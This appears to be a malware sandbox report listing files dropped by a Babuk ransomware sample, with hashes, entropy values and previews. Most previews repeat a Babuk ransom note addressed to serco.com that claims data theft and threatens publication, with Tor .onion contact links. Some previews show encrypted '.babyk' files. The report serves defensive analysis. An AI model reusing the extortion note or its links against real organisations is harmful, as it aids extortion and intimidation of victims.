                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.522442628210813
                                                                            Encrypted:false
                                                                            SSDEEP:3:tl+v+SypssrcZRzL3LDAWmvu7qmvfy/MGkBzOjxH+lzD1gKamXCcmUxNvEEn:OVytoR3LD/YYfsMGkBid+lzDDO0vtn
                                                                            MD5:CA5BA346088767C1F59793AC586828E1
                                                                            SHA1:FEE54D0B728DE48460E49C3FC87F280EB6B19682
                                                                            SHA-256:2A173B2608BCE32CB409B92883FB16CFBA9FC5EEDBB13D9BCE65FD4E666AE821
                                                                            SHA-512:877FB2C4C035DDB1FB404498710310CDCA2FDCFD4C5F9EB216F98EC892FE5971A701C37C408F9DCEF2B5434CFACDAEDDD8894C8B6D4B0DA445C8754801E9009E
                                                                            Malicious:false
                                                                            Preview: .....qhJ...7..H.gz.I{..`..(B..'!..eC?.8....[&..A...k.C...,...J..5.I...L.........k...#..q....h'.....u...K....{....M..J.-P..9....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.9777555046074
                                                                            Encrypted:false
                                                                            SSDEEP:192:fQXX56E1qcCku6AcawJpig8VVWAJh+nbSIwA30MyA:wABzcakUg8VVWoAnbSrA30MyA
                                                                            MD5:BFB07572D2BD2BC7E647AF3B8A2B4E4B
                                                                            SHA1:B3AC02E6D715B290DD0A9CF3C3F2439127F57CA2
                                                                            SHA-256:1585087C2A1B5A5EEA13F172ABA183350AC025D1B62A30A617612220AFE21A3F
                                                                            SHA-512:F8D3A2C87BD3E54091347DB5624FFAFA7FCBA65D0859C11C7BD7B954BB01534C7FC71C17FA0C1F8C251B9504B8CE2579CDB9C1102B067725DD278CDB50D7B8B1
                                                                            Malicious:false
                                                                            Preview: pi.`....'.._.t....z.vv4J..|..S........$..^...*F..j.b@i.D.l.(Q<.*..x./:...Iq%....V..5........t.PrU7..........8"I...2.bj"..Y..[..#.@.gp..@..... '......~.|.t.~..Z....Q..{.!*..t...?..%p..Q..N,.f...m..;A.P.?#..#.K.z/_|.....M;tY[4..j...$OT....2G.Uw..Be..w.......m.:..&dU..N.+.\....x7<.t...a*...~..$..i.:J....A.r...{...1.;..9o....U..-unj..vA....].z.Z.\..1..vc.J........#q..}>F..bZw.u#...q. .E..h`..:..k........{.....r.mxQ@(F. ..].....-/1...|...F|.b...76....4...]d^..^mS.Z....O.2.x....0rX-.3.m..z.O.N,.y..z......>.$.....!....UU..*...z.<.c. $...k..y....<.|....R..../$g....#...9f?.M...!.f0.r.8.[.........Xv.......:Z..!..o....(tY....A...V...u..k.P....z..T..d.o...I.qb....tKHO.G.08.\..!.<:.`B.tt...1...9`...*..)Q.$.I.'1.tq.Y..'jv7fE....$.R...r...\...p_...I.K.....85.(..lwI...\17...J2..`.r...(7[..Fl.R.xG....2.!...B....;j..J.....;..s.g-...w.q$...k8.5 N.b.k .r.C....Q.I>."4..=&.k.}.....!..A..>Y.|#}`xAD@<s.mR...l.............k.0g...._..|..Q.....J....7l..]..a./S_}-
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\InputApp_cw5n1h2txyewy\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
